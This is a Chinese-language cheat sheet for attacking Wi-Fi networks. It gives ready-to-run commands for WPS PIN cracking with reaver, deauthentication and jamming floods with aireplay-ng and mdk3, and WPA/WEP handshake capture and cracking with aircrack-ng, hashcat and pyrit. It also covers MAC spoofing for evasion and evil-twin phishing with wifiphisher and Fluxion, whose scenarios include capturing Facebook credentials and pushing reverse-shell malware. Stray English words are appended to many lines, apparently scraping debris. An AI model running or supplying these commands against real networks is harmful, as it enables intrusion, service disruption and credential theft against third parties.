wlan0:無線網卡設備php
BSSID/AP's MAC:目標路由器的mac地址html
Client's MAC:鏈接到此wifi客戶端的mac地址python
ESSID:這個無線的名字linux
大體思路:git
獲取bssid和essid airodump命令 探測是否開啓wps airodump-ng MB,wash -i mon0 -C 探測pin reaver -i mon0 -b ap_bssid -vv ddos攻擊 mdk3 a mon0 -a bssid -c 相關閱讀:http://www.mottoin.com/91376.html
CH[X] 掃描的信道號,由於airodump是跳頻掃描的,會一直掃描13個信道。後面是你的掃描時間和你本地時間。 BSSID:路由器MAC地址 PWR:網卡的信號水平,新號越好數值越大,可是例如第一個出現‘-1’說明該客戶端不在個人監聽範圍內。 Beacons:就是Beacon數據的速率 #Date:被捕獲的數據分組數量 #/S :十秒內的捕獲數據分組量 CH:信道號,是從beacon包裏面獲取的(在企業無線滲透中提到過beacon內容) MB:是一直支持速率,關於802.11標準的,不過通常是用來看是否開啓wps的,通常狀況下54e.後面有.的都是開啓的,可是也不徹底。 ENC:(Encryption )所使用的加密算法體系。Open=無加密,WPA=WPA/WPA2=WPA2 CIPHER:加密算法,如CCMP,TKIP…. Auth:(Authentiction)認證協議:如:PSK:(PWA/WPA2的預共享密鑰)或是OPEN(WEP開放)MGT(則是802.1x、eap、radius)由於MGT是獨立認證服務器 ESSID:就是SSID Station:客戶端MAC Notassociated:就是證實客戶端沒跟AP連上。Associated認證在上一篇文章提到過。 Lost:是10秒丟包數據 Rate:傳輸速率 Probe:就是一個client試圖去連目標AP但沒連上 Frame:通訊幀數
無線網卡開啓混雜模式
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 upgithub
從混雜模式中恢復
ifconfig wlan0 down
iwconfig wlan0 mode managed
ifconfig wlan0 up算法
附:有線網卡開啓混雜模式shell
ifconfig eth0 promisc 設置網卡爲混雜模式
ifconfig eth0 -promisc 從混雜模式中恢復npm
重啓網卡的命令api
service network-manager restart
(/etc/init.d/network-manager restart
sudo systemctl restart NetworkManager)
service networking restart
保護措施 macchanger -s [網卡] #查看網卡當前的MAC macchanger -m 想僞造的MAC 網卡 #僞造MAC macchanger -A wlan0 #修改網卡mac地址爲隨機地址 vi /etc/hostname #修改主機名 echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all #防止ping
無線DOS aireplay-ng -0 3 –a BSSID –c clientMAC wlan0 mdk3 mon0 a –a AP'MAC -s 80 mdk3 mon0 d -c 信道 #攻擊client MAC mdk3 mon0 b –g –c 11 –h 7 #發動虛假AP信號進行干擾 mdk3 mon0 b –n ESSID –g –c 11 #對指定名稱(ESSID)發送干擾,-g是假裝爲54M的標準的802.11無線網絡,-c頻道
一. Pin碼破解
無線網卡開啓混雜模式 ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up
掃描開啓wps的AP
wash -i wlan0
這裏須要強調一下,網上不少教程裏都有-C這個優化參數,當初寫這篇博文的時候也有這個參數,不過新版本的wash已經再也不支持,感謝Demon先生的友情提醒。
破解ping碼
reaver -i 混雜網卡名 -c 信道 -b AP'MAC -a -S -vv -d 9 -t 9 (混雜模式使用) 目標信號很好: reaver -i wlan0 -b MAC -a -S -vv -d0 -c 1 目標信號普通: reaver -i wlan0 -b MAC -a -S -vv -d2 -t 5 -c 1 目標信號通常: reaver -i wlan0 -b MAC -a -S -vv -d5 -c 1
經過pin碼直接獲取路由器密碼
reaver -i 混雜網卡名 -b MAC -p PIN8位數
二. 暴力破解
使用經典的Aircrack-ng
WPA/WPA2
(1)無線網卡開啓混雜監聽模式 ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up --> wlan0
或者:
airmon-ng start wlan0 --> wlan0mon
若是不行:
airmon-ng check kill
airmon-ng start wlan0
(2)探測無線網絡
airodump-ng wlan0mon airodump-ng -c 信道 -w 保存的數據包名 –-bssid AP’MAC wlan0mon
例:
airodump-ng -c 6 --bssid 69:71:5E:51:38:EE -w /home/OKing/wifi/FAST_33687 wlan0mon
(3)強制解除客戶端認證
aireplay-ng -0 攻擊次數 -a AP’MAC [-c 客戶端MAC] [-e bssid] wlan0mon [--ignore-negative-one]
例:
aireplay-ng -0 10 -a 69:71:5E:51:38:EE -c 78:AF:8E:7D:8A:9D -e FAST_33687 wlan0mon
若是信道里有-1,則須要 --ignore-negative-one 參數
aireplay-ng -0 10 -a 69:71:5E:51:38:EE -c 78:AF:8E:7D:8A:9D -e "My WiFi" wlan0mon --ignore-negative-one
在沒有客戶端鏈接的狀況下,可以使用假身份認證攻擊(模擬用戶認證鏈接,攻擊這個模擬用戶) aireplay-ng --fakeauth -q 10 -a AP'MAC -h 模擬用戶的MAC aireplay-ng --arpreplay -b AP'MAC -h 模擬用戶的MACs
(4)密碼破解
aircrack-ng 數據包名.cap –w 字典路徑 airdecap-ng -l -e bssid –p 密碼數據包名.cap //破解出密碼後,解析加密內容 WEP (1)airmon-ng start wlan0 [信道] 或 airmon-ng check kill airmon-g start wlan0
啓動監聽後的混雜模式網卡: wlan0mon (2)airodump-ng wlan0mon0 (3)airodump-ng -c 信道 -w 數據包名 [--bssid AP’MAC] --ivs wlan0mon0 (4)aireplay-ng -3 -b AP’MAC -h客戶端MAC [-x 1024(每秒發送包數量)] wlan0mon0 (5) aircrack-ng 數據包名.ivs –w 字典路徑 (解密的報文ivs要20000以上) (6) aircrack-ng -x -f 2 包名.ivs -x 暴力破解 -f 2 複雜度爲2 airdecap-ng –w 解密前的祕鑰 數據包名.ivs 如:KEY FOUND! [31:32:33:34:35:36:37:38:39:30:61:61:61] (ASCII:1234560aaa) //藍色部分是解密前的密鑰
wesside –v AP’MAC –k 1(重發數據包次數) –i mon0 //aircrack-ng套件中的自動化破解weo加密wifi工具,但成功率較低
tkiptun-ng –a AP’MAC -h 客戶端MAC 網卡 //aircrack-ng套件中的自動化破解wpa/wpa2加密wifi的工具(可加參數:-m 最小數據包長度 -n 最大數據包長度)
輔助命令
airdecloack-ng --bssid AP’MAC --filters signal –i 包名.cap #過濾出指定AP報文數據(會生成*.pcap的報文)
ivstools --convert a.cap b.ivs //將cap數據包轉換成ivs數據包
ivstools --merge a.ivs b.ivs ab.ivs //將數據包過濾合併
握手包破解命令
john --wordlist=password.lst --rules --stdout | aircrack-ng -e essid -w - xxx.cap 使用john在字典上執行排列匹配,將各類組合詞提供給aircrack-ng破解使用 pyrit -r xxx.cap -i password.lst attack_passthrough GPU加速破解 (time 程序/命令名 #計算程序執行時間) cowpatty -s ESSID -r xxx.cap -d /path/彩虹表路徑 (若SSID中包含空格,要用引號) 爲cowpatty破解制做專用hash tables : genpmk -f 字典 -d 要生成的hash table -s ssid 不少組織都本身創建了wpa table庫,也就是預先使用常見的essid生成hash table 若是要破解essid相同的無線密碼,直接網上下載,無需本身再生成 國內比較有名的就是ZerOne團隊針對國內常見essid生成的hash table
如今有不少調用aircrack-ng套件自動化抓包破解的項目,能夠去github上瞧瞧。
命令行下wifi自動化破解工具
它會根據目標路由器,自動選擇合適的破解方式,好比pin碼破解,抓包暴力破解等
(1)開啓無線網卡監聽模式
ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up
或者: airmon-ng start wlan1
(2)啓動wifite,此時會自動加載混雜模式下的網卡,探測無線網絡
Ctrl + C 中止探測,儘可能選擇有client的無線進行破解。或者添"all"破解全部
(3)等待破解結果便可...
Fern-wifi-cracker
一個強大的圖形化工具,傻瓜式,使用方便
破解方式再也不介紹,網上比較多。
在ToolBox工具箱中還有一些不錯輔助小工具
輔助命令
wpaclean out.cap in.cap //整理包文件內容,保證它的格式內容與密碼破解程序兼容 aircrack-ng out.cap -J out.hccap //要把cap數據包轉換成hccap數據包才能用oclHashcat破解 cudaHashcat-plus64.exe -m 2500 out.hccap //破解WPAv2哈希
針對暴力破解,有一個能夠在線破解握手包的站點 https://gpuhash.me/,可是複雜的密碼是要付費的
添加一個任務,上傳握手包
wififisher
項目地址: https://github.com/sophron/wifiphisher
簡介:
WifiPhisher使用相似「邪惡雙胞胎」的攻擊手法,首先創建一個冒充合法無線訪問點的虛假訪問點,
而後對合法訪問訪問點發起拒絕服務攻擊,或是在其周圍創建無線信號干涉,以切斷用戶與合法訪問點的鏈接,迫使用戶設備自動鏈接攻擊者僞造的虛假訪問點
當受害者鏈接到僞造的AP後,會被強制重定向到一個僞造的路由器配置界面,提示路由器固件更新需從新認證密碼……
工具裏提供了許多型號路由器的僞造頁面適合更多場景,使用時候須要兩個無線網卡
安裝:sudo python setup.py install
安裝依賴 PyRIC-0.1.6.2 的時候卡住了,本身翻Q下載的
https://pypi.python.org/packages/ae/d3/933690b57767006c11ea4b68bf72dd91511fc20b19fe655f49c145392ec2/PyRIC-0.1.6.2.tar.gz#md5=b26291a5e23fd733dbd2bafe602e4ddb
cd PyRIC-0.1.6.2
sudo python setup.py install
參數 -m 最大|選擇要取消受權的客戶端的最大數量。客戶列表將被清空,並在達到限制後從新填充。示例:-m 5 -n noupdate |當達到最大(-m)個客戶端/ AP組合數時,不要清除解除列表。必須與-m一塊兒使用。示例:-m 10 -n -t 時間間隔|選擇發送報文的時間間隔。默認值儘量快。若是看到scapy錯誤,如"no buffer space",請嘗試:-t .00001 -p 選擇在每一個解擾脈衝串中要發送的數據包數量。默認值爲1; 1分組到客戶端,1個分組到AP。向客戶端和AP同時發送2個deauth數據包:-p 2 -d 跳過去認證分組到接入點的廣播地址,而且只將它們發送到客戶端/ AP對 -a 輸入要定向的特定接入點的MAC地址 -jI 干擾接口。默認狀況下,腳本會找到最強大的接口並開始監視模式。 -aI apinterface |選擇僞接口的接口。默認狀況下,腳本會找到第二大功能的接口並啓動監視模式。
幾種欺騙模式:
1 - 網絡管理器鏈接 模仿網絡管理器的行爲。 此模板顯示Chrome的「鏈接失敗」頁面,並經過要求預共享密鑰的頁面顯示網絡管理器窗口。 目前,支持Windows和MAC OS的網絡管理器。 2 - 固件升級頁面 因爲固件升級,沒有標識或品牌要求WPA / WPA2密碼的路由器配置頁。 適合移動設備。 3 - 瀏覽器插件更新 通用瀏覽器插件更新頁面,可用於向受害者提供有效負載。 4 - OAuth登陸頁面 免費Wi-Fi服務要求Facebook憑據使用OAuth進行身份驗證
用法
經過鍵入`wifiphisher`或`python bin / wifiphisher`(從工具目錄中)運行該工具。
經過運行沒有任何選項的工具,它將找到正確的接口,並交互地要求用戶選擇目標網絡的ESSID,以及要執行的網絡釣魚場景。
******
wifiphisher -aI wlan0 -jI wlan1 -p firmware-upgrade
使用wlan0生成流氓接入點和wlan4 DoS攻擊。從列表中手動選擇目標網絡,而後執行「固件升級」方案。用於手動選擇無線適配器。 「Firware升級」方案是從密碼保護網絡獲取PSK的簡單方法。
******
wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd
自動選擇正確的接口。使用ESSID「CONFERENCE_WIFI」定位Wi-Fi並執行「插件更新」方案。 Evil Twin將使用PSK「s3cr3tp4ssw0rd」進行密碼保護。
對於具備公開的PSK的網絡有用(例如在會議中)。
「插件更新」方案爲受害者下載惡意可執行文件(例如包含反向shell有效內容的惡意軟件)提供了一種簡單的方法。
******
wifiphisher --nojamming --essid "FREE WI-FI" -p oauth-login
```
不要定位任何網絡。只需生成一個開放的Wi-Fi網絡,使用ESSID ""FREE WI-FI" ,並執行「OAuth登陸」方案。
對公共區域的受害者有幫助。 「OAuth登陸」方案提供了一種從社交網絡(如Facebook)捕獲憑據的簡單方法。
*****
遇到端口被佔用的狀況
查看端口被哪一個進程佔用
(1)netstat -pan | grep 端口
(2)fuser -v -n tcp 端口號
(3)lsof -i:端口號
殺死進程
killall 進程名稱
kill -9 進程id
Fluxion
原理與上面的wifiphisher差很少,也是創建僞AP以後強行攻擊是合法客戶端,迫使其鏈接到僞造的AP上,而後彈出提示框,要求從新認證wifi密碼
安裝時會遇到沒法安裝php5-cgi的問題,由於新版本已再也不支持,kali上能夠安裝php-cgi替代。
另外,有deb安裝包:https://sourceforge.net/projects/wififluxion/files/Fluxion_0.23_all.deb/download
使用過程步驟清晰簡單
效果:
GUI界面
目前最新版fluxion也添加許多假裝頁面,再也不是之前簡單的彈框了,如路由器固件升級等。。。
kali支持的無線網卡
http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html
相似內容:
實戰演練之Evil Twin攻擊
兩個不錯的小工具
LinSSID:一款Linux下的圖形化Wi-Fi掃描器
waidps :開源無線WiFi入侵檢測&防禦系統